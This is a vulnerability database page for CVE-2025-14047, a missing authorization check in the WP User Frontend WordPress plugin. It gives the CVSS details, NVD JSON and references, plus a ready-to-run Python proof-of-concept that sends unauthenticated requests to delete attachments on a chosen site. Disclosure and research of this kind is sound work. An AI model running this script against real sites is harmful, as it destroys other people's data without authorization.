Security Vulnerability Report
中文
CVE-2025-14047 CVSS 5.3 MEDIUM

CVE-2025-14047

Published: 2026-01-02 03:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'Frontend_Form_Ajax::submit_post' function in all versions up to, and including, 4.2.4. This makes it possible for unauthenticated attackers to delete attachment.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP User Frontend <= 4.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14047 PoC - Unauthorized Attachment Deletion # Target: WP User Frontend plugin <= 4.2.4 def delete_attachment(target_url, attachment_id, proxy=None): """ Exploit for CVE-2025-14047 Missing authorization check in Frontend_Form_Ajax::submit_post Allows unauthenticated attackers to delete attachments Args: target_url: Target WordPress site URL attachment_id: ID of the attachment to delete proxy: Optional proxy for testing """ endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Prepare the malicious request data = { 'action': 'wpuf_submit_post', # Plugin AJAX action 'post_id': str(attachment_id), # Target attachment ID 'wpuf_delete': '1', # Delete flag 'submit': 'Delete' # Submit button value } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } proxies = {'http': proxy, 'https': proxy} if proxy else None try: print(f"[*] Sending deletion request for attachment ID: {attachment_id}") response = requests.post(endpoint, data=data, headers=headers, proxies=proxies, timeout=30, verify=False) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Response status: {response.status_code}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == '__main__': if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <attachment_id>") print(f"Example: python {sys.argv[0]} http://example.com 123") sys.exit(1) target = sys.argv[1] attach_id = sys.argv[2] delete_attachment(target, attach_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14047", "sourceIdentifier": "[email protected]", "published": "2026-01-02T03:15:50.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'Frontend_Form_Ajax::submit_post' function in all versions up to, and including, 4.2.4. This makes it possible for unauthenticated attackers to delete attachment."}, {"lang": "es", "value": "El plugin de Registro, Perfil de Usuario, Membresía, Restricción de Contenido, Directorio de Usuarios y Envío de Publicaciones desde el Frontend – WP User Frontend para WordPress es vulnerable a la pérdida no autorizada de datos debido a una comprobación de capacidad faltante en la función 'Frontend_Form_Ajax::submit_post' en todas las versiones hasta la 4.2.4, inclusive. Esto hace posible que atacantes no autenticados eliminen archivos adjuntos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax.php#L25", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax.php#L69", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L133", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L35", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L55", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3430352/wp-user-frontend/trunk/includes/Ajax/Frontend_Form_Ajax.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6e95b16f-a25a-45c7-a875-2d34a1e127ce?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.